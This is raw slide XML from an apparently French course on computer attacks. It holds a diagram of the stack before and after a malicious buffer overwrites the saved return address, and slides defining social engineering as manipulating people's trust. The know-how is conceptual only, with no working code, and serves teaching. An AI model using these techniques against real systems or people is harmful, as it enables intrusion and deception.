                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>(Ecrasé)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="299308">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Nouvelle adresse de retour</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>(Ecrasé)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2238375">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>(Ecrasé)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="323275">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnB w="12700" cmpd="sng">
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="94" name="Groupe 93"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9708617" y="4186519"/>
            <a:ext cx="701888" cy="276999"/>
            <a:chOff x="8756312" y="3740801"/>
            <a:chExt cx="701888" cy="276999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="ZoneTexte 94"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9024326" y="3740801"/>
              <a:ext cx="433874" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" err="1" smtClean="0"/>
                <a:t>ebp</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="96" name="Connecteur droit avec flèche 95"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8756312" y="3897963"/>
              <a:ext cx="324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97" name="Flèche courbée vers la droite 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9708617" y="2539861"/>
            <a:ext cx="258684" cy="1070064"/>
          </a:xfrm>
          <a:prstGeom prst="curvedRightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15466"/>
              <a:gd name="adj2" fmla="val 42728"/>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98" name="ZoneTexte 97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1965529" y="1324271"/>
            <a:ext cx="2740403" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>Etat de la Stack avant la copie du buffer</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="ZoneTexte 98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587302" y="6498988"/>
            <a:ext cx="2307708" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>(buffer malicieux)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="ZoneTexte 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7236228" y="1221329"/>
            <a:ext cx="2740403" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>Etat de la Stack après la copie du buffer</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37019615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par ingénierie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="11559540" cy="5156898"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ingénierie sociale</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>La méthode de piratage la plus simple ne demande aucune compétence en informatique.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>L'ingénierie sociale est une forme d'attaque qui exploite la nature humaine et le comportement humain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Les personnes sont un maillon faible de la sécurité car elles peuvent commettre des erreurs, être amenées à causer des dommages ou violer intentionnellement la sécurité de l'entreprise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>Les attaques d'ingénierie sociale exploitent des caractéristiques humaines telles qu'une confiance basique dans les autres, un désir de fournir une assistance ou une propension à se montrer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Exploité la naïveté et la faiblesse psychologique d’une ressource humaine pour récupérer des informations susceptible d’être utile dans la phase d’attaque.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>L'objectif </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0"/>
              <a:t>est de convaincre ou de manipuler quelqu'un pour qu'il fasse quelque chose qu'il ne ferait pas normalement pour quelqu'un qu'il ne connaît pas</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2400"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63</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9823814" y="0"/>
            <a:ext cx="2272936" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il n y a pas de patch pour la stupidité humaine</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22619276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par ingénierie</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="11559540" cy="803973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vecteurs d’attaques d’ingénierie sociale</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64</a:t>
            </a:fld>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30" y="2226974"/>
            <a:ext cx="4954194" cy="3298615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Imag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207" y="1825612"/>
            <a:ext cx="6010422" cy="4062113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Imag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5397" y="1618712"/>
            <a:ext cx="5265662" cy="4428132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Imag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053" y="1609725"/>
            <a:ext cx="6077798" cy="4706007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Imag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845" y="2062291"/>
            <a:ext cx="7028620" cy="4039437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Forme libre 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="4922778"/>
            <a:ext cx="238346" cy="1362500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1362500"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1362500"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 1362500 h 1362500"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 1362500 h 1362500"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="1362500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="1362500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="1362500"/>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97293" tIns="646671" rIns="97294" bIns="646670" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Forme libre 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="4922778"/>
            <a:ext cx="238346" cy="908333"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 908333"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 908333"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 908333 h 908333"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 908333 h 908333"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="908333">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="908333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="908333"/>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108396" tIns="430690" rIns="108396" bIns="430689" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Forme libre 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="4922778"/>
            <a:ext cx="238346" cy="454166"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 454166"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 454166"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 454166 h 454166"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 454166 h 454166"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="454166">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="454166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="454166"/>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119050" tIns="214261" rIns="119051" bIns="214260" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Forme libre 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="4877058"/>
            <a:ext cx="238346" cy="91440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 45720 h 91440"/>
              <a:gd name="connsiteX1" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 45720 h 91440"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="91440">
                <a:moveTo>
                  <a:pt x="0" y="45720"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="238346" y="45720"/>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125914" tIns="39761" rIns="125915" bIns="39762" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Forme libre 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="4468611"/>
            <a:ext cx="238346" cy="454166"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 454166 h 454166"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 454166 h 454166"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 454166"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 454166"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="454166">
                <a:moveTo>
                  <a:pt x="0" y="454166"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="454166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="0"/>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119050" tIns="214261" rIns="119051" bIns="214260" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Forme libre 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="4014444"/>
            <a:ext cx="238346" cy="908333"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 908333 h 908333"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 908333 h 908333"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 908333"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 908333"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3" y="connsiteY3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="238346" h="908333">
                <a:moveTo>
                  <a:pt x="0" y="908333"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="119173" y="908333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238346" y="0"/>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108396" tIns="430690" rIns="108396" bIns="430689" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="222250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="500" kern="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Forme libre 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9687047" y="3560278"/>
            <a:ext cx="238346" cy="1362500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 238346"/>
              <a:gd name="connsiteY0" fmla="*/ 1362500 h 1362500"/>
              <a:gd name="connsiteX1" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY1" fmla="*/ 1362500 h 1362500"/>
              <a:gd name="connsiteX2" fmla="*/ 119173 w 238346"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1362500"/>
              <a:gd name="connsiteX3" fmla="*/ 238346 w 238346"/>
